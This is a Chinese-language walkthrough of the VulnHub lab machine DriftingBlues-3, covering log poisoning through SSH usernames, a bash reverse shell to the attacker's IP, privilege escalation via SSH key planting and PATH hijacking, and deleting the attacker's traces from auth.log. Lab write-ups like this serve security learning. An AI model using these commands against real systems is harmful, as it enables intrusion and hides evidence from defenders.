vulnhub靶场【DriftingBlues】之3

前言

靶机:DriftingBlues-3,IP地址192.168.1.60

攻击:kali,IP地址192.168.1.16

都采用虚拟机,网卡为桥接模式

主机发现

使用arp-scan -lnetdiscover -r 192.168.1.1/24

信息收集

使用nmap扫描端口

网站探测

访问80端口,并查看页面源码,发现有图片等信息,可能是网站型目录

使用gobuster、dirsearch、ffuf、dirb、dirbuster等工具扫描目录

shell 复制代码
gobuster dir -u http://192.168.1.60 -w /usr/share/wordlists/dirb/big.txt -x php,zip,md,txt,html,jpg -b 404 -d

访问robots.txt,发现eventadmins/目录

访问drual、phpmyadmin、privacy,发现都是信息ABCABCD

访问secret

访问wp-admin

访问eventadmins/目录

翻译一下,发现/littlequeenofspades.html页面

访问/eventadmins

漏洞寻找

查看页面源代码,发现编码aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码这个

访问/adminsfixit.php,发现是ssh连接的认证日志,通过测试发现确实会记录ssh登录时的用户名、地址和端口

shell 复制代码
ssh test@192.168.1.60

尝试连接,修改ssh连接时的用户为php脚本,测试是否可以

访问页面

测试是否可行

漏洞利用

尝试使用bash命令反弹

shell 复制代码
bash -c 'bash -i >& /dev/tcp/192.168.1.16/9999 0>&1'
进行URL编码
bash+-i+>%26+%2fdev%2ftcp%2f192.168.1.16%2f9999+0>%261%0a

kali中开启监听,然后使用浏览器执行上面的反弹命令

靶机内信息收集

使用find寻找具有SUID权限和capabilites

shell 复制代码
find / -perm -4000 -print 2>/dev/null
find / -type f -executable 2>/dev/null | xagrs getcap -r 2>/dev/null

查看定时任务

shell 复制代码
cat /etc/crontab

查看网络状态信息

查看备份文件夹,看有无信息

使用find寻找其他用户具有可写权限

shell 复制代码
find /home -perm /2 2>/dev/null
-perm /2   是指其他用户具有可写权限,/2是指写权限

查看这个目录,发现具有写权限

提权

提权至robertj

kali生成ssh的公私钥

然后把公钥id_rsa.pub上传到这个目录下,改名为authorized_keys

然后使用ssh私钥连接

之前使用find寻找具有SUID权限文件,发现getinfo,在linux中并无该命令,测试该命令

把这个文件下载到kali

shell 复制代码
scp robertj@192.168.1.60:/usr/bin/getinfo ./

使用strings命令查看

提权至root

那么可以使用export设置临时变量的优先目录,最好在/tmp目录

编写脚本提权

shell 复制代码
echo "/bin/bash" > ip

查看flag

清除痕迹

清理日志

shell 复制代码
sed -i "/192.168.1.16/d" auth.log

删除之前生成的公钥

清除命令历史记录

总结

  1. 主要考证日志文件的利用,这里就是利用验证登录日志auth.log通过adminsfixit.php文件展露
  2. 然后就是考察ssh公私钥的使用
  3. 考察临时环境变量的优先级目录
相关推荐
lingggggaaaa3 分钟前
小迪安全v2023学习笔记(七十讲)—— Python安全&SSTI模板注入&项目工具
笔记·python·学习·安全·web安全·网络安全·ssti
王廷胡_白嫖帝4 分钟前
Qt网络速度测试工具开发教程 - 从零开始构建网络测速应用
开发语言·网络·qt
夏婵语冰2 小时前
实用R语言机器学习指南:从数据预处理到模型实战(附配套学习资源)
开发语言·学习·r语言
好望角雾眠2 小时前
第三阶段数据库-7:sql中函数,运算符,常用关键字
数据库·笔记·sql·学习·sqlserver·c#
青草地溪水旁8 小时前
如何理解AP服务发现协议中“如果某项服务需要被配置为可通过多个不同的网络接口进行访问,则应为每个网络接口使用一个独立的客户端服务实例”?
网络·服务发现·客户端实例
门思科技9 小时前
LoRaWAN 的网络拓扑全解析:架构、原理与应用实践
服务器·网络·人工智能·科技·物联网·架构
我的收藏手册9 小时前
Linux 网络命令大全
linux·服务器·网络
焊锡与代码齐飞9 小时前
嵌入式第三十五课!!Linux下的网络编程
linux·运维·服务器·开发语言·网络·学习·算法
2501_9277730710 小时前
Linux操作系统编程——网络
linux·运维·网络
奇树谦10 小时前
WindowsAPI|每天了解几个winAPI接口之网络配置相关文档Iphlpapi.h详细分析9
网络·windowsapi